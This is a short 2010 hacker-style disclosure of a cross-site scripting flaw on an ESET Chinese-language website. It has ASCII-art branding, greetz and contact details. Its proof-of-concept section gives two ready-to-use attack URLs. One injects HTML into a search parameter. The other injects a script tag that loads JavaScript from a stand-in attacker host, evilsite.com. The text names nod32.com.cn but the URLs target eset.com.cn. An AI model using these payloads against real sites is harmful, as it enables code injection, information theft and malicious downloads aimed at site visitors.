NOD32.com.cn suffers from a cross site scripting vulnerability.
fb4b1550bb37da38c4ab17d717730a41ab2bded81a2de65c8471c31e204e9a4c
.___________ ________ http://www.nod32.com.cn
____ ____ __| _/\_____ \ \_____ \ ____ ____
/ \ / _ \ / __ | _(__ < / ____/ _/ ___\ / \
| | ( <_> ) /_/ | / \/ \ \ \___| | \
|___| /\____/\____ | /______ /\_______ \ / \___ >___| /
\/ \/ \/ \/ \/ \/ \/
> Cross Site Scripting Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: http://greyhathackers.wordpress.com
> Vulnerability: Cross Site Scripting
————————-
1. INFORMATION |
————————-
Site: http://www.nod32.com.cn
Vulnerability: Cross Site Scripting
Vulnerability Level: 3
————————-
2. DESCRIPTION |
————————-
http;//www.nod32.com.cn suffers a remote cross site scripting exploit, which can be used to
scam information and to execute malicious javascript which might remotely download a file to the
victim’s PC.
————————-
3. PROOF OF CONCEPT |
————————-
Display a message using HTML:
http://www.eset.com.cn/default.php?id=181&p=24&searchword=%3Ch1%3EXSS+-+Sora%3C%2Fh1%3E%3E%22%3Ctitle%3E%3Cmarquee%3EXSS%20by%20Sora%20-%20IMPROVE%20YOUR%20SECURITY%20-%20greyhathackers.wordpress.com&btnG=
Execute malicious code:
http://www.eset.com.cn/default.php?id=181&p=24&searchword=<script src=”http://www.evilsite.com/foo.js”><h2>Error</h2>&btnG=
————————-
4. GREETZ |
————————-
# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes #
————————-
5. CONTACT |
————————-
Have any questions? Send me a mail or add me on MSN: vhr95zw [at] hotmail [dot] com
<c> 2010 – http://greyhathackers.wordpress.com – Sora